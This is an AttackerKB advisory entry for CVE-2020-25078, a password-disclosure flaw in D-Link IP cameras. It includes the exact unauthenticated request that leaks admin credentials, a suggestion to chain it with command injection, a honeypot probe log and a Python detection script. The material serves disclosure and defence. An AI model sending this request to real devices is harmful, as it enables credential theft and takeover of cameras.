AttackerKB AKB:D99A6214-1073-40AA-8AB4-79EEBB4A08A7
Sep 02, 2020 - 12:00 a.m.

CVE-2020-25078


CVSS2: 5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: NONE
Availability Impact: NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.825 High
Percentile: 98.4%

An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.

Recent assessments:

kevthehermit at March 04, 2021 12:03am UTC reported:

Vulnerability

The D-Link DCS-2530L is an IP Camera. This means it is more likely to be a target for botnets / IoT auto exploitation rather than anything else.

Triggering the exploit is very simple; it's just a GET request to the /config/getuser?index=0 endpoint, and it returns the user|password combinations in clear text.

This can be paired with a second vulnerability reported at the same time, an authenticated command injection vuln, to gain access. See the exploited section below for more details.

Resources

The original tweets have been deleted but archive.org has them

<https://web.archive.org/web/20200617135938/https://twitter.com/Dogonsecurity/status/1273251236167516161>

In the wild.

My honeypots picked up a couple of pings on this; I am assuming automated scanning by some botnets.

{
    "http_headers": {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-GB,en;q=0.5",
        "Connection": "close",
        "Host": "REDACTED:8080",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
    },
    "http_host": "REDACTED:8080",
    "http_method": "GET",
    "http_path": "/config/getuser",
    "http_post": {},
    "http_query": "/config/getuser?index=0",
    "http_remote": "205.185.122.102",
    "http_scheme": "http",
    "http_version": "HTTP/1.1",
    "src_ip": "205.185.122.102"
}

Assessed Attacker Value: 2
Assessed Attacker Value: 5
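
A detection sketch for the kind of probe recorded above, added here as an example and not part of the original assessment or of AttackerKB: it scans JSON-lines honeypot or proxy events that use the http_query, http_path and src_ip fields from that record and counts requests to /config/getuser per source. The sample events and the names find_probes and normalise_path are constructed for illustration.

```python
import json
import posixpath
from collections import Counter
from urllib.parse import unquote, parse_qs

TARGET_PATH = "/config/getuser"  # endpoint named in the CVE description

# Constructed sample events (not real traffic), using field names from the
# honeypot record above; source addresses are from documentation ranges.
SAMPLE_EVENTS = """\
{"http_query": "/config/getuser?index=0", "src_ip": "192.0.2.10"}
{"http_query": "/config/%67etuser?index=1", "src_ip": "192.0.2.10"}
{"http_query": "//config/./getuser/?index=0", "src_ip": "198.51.100.7"}
{"http_query": "/config/getuserlist", "src_ip": "198.51.100.8"}
{"http_query": "/index.html", "src_ip": "198.51.100.9"}
not-json garbage line
"""

def normalise_path(path):
    """Percent-decode and canonicalise a request path before comparing it."""
    decoded = unquote(path)
    # Force a single leading '/', then collapse '//', '.' and trailing '/'.
    return posixpath.normpath("/" + decoded.lstrip("/")).lower()

def find_probes(lines):
    """Return (hits, per-source counts) for requests to the disclosure endpoint."""
    hits, by_source = [], Counter()
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the run
        if not isinstance(event, dict):
            continue
        target = event.get("http_query") or event.get("http_path") or ""
        path, _, query = target.partition("?")
        if normalise_path(path) != TARGET_PATH:
            continue  # exact match only: /config/getuserlist is not a hit
        index = parse_qs(query).get("index", [None])[0]
        hits.append({"src_ip": event.get("src_ip"), "index": index, "raw": target})
        by_source[event.get("src_ip")] += 1
    return hits, by_source

if __name__ == "__main__":
    found, sources = find_probes(SAMPLE_EVENTS.splitlines())
    for hit in found:
        print(hit["src_ip"], "index=%s" % hit["index"], hit["raw"])
    print("requests per source:", dict(sources))
```

On a camera that should never expose this endpoint to untrusted networks, any hit is worth reviewing, and a source that walks several index values is a candidate for blocking.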
